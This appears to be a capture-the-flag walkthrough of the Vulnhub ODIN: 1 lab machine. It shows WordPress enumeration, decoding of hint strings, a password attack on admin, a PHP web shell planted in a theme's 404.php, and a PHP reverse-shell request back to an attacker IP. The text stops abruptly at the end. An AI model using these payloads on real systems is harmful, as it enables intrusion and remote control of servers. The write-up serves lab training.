Vulnhub - ODIN: 1
Introduction
Difficulty: Easy
Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants in the guise of a walker named Vegtam. Mímir, who guarded the well, to allow him to drink from it, asked him to sacrifice his left eye, this being a symbol of his will to obtain knowledge
This is ODIN: 1 from Vulnhub.
Ports
HTTP only.
HTTP
It says:
vikingarmy
Just another Joomla site
But that’s a little joke because it’s actually wordpress.
root@kali:/opt/vulnhub/odin# wpscan -e --url http://odin
wp-scan only finds a user called ‘odin’, but trying to login at wp-admin with any random password gives an error:
Unknown username. Check again or try your email address.
So that’s curious. What if we try admin?
Error: The password you entered for the username admin is incorrect
Right. So admin exists; odin does not. What’s up with that, wp-scan? Lol.
We also have some encoded strings on the blog:
NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC 63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTU MFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU===
This is base32:
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz rockyou nice wordlist
We have this:
SWYgeW91IGxvb2sgY2xvc2VseSwgeW91IHdvbid0IG5lZWQgaXQgaGVyZQo=
Which is base64:
If you look closely, you won’t need it here
And this:
++++++++++[>+>+++>+++++++>++++++++++««-]»»++++++++++.+.+++++.————.+.+++++.——-.
Which appears to be brainf^%k, which translates to:
nottuzy
Which never appears to be useful.
So a password attack on admin? Yes.
wp-admin
One of the blog posts is called:
Twenty Twenty: 404 Template (404.php)
Wonder if that is a hint?
We can edit the file here:
http://odin/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty
And add:
<?php system($_GET['cmd']);?>
into the upper part of the file beneath the opening html tag. We can then access the file at:
http://odin/wp-content/themes/twentytwenty/404.php?cmd=id
And issue commands. Like a shell. Like this:
GET /wp-content/themes/twentytwenty/404.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.150",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
On the box
We can login to mysql with joomla:joomla and grab some hashes but they don’t want to break easily, but there is a shortcut here. Linpeas has a mode (-a) that will brute force su. And we have weak passwords:
So really that’s it; let’s check it: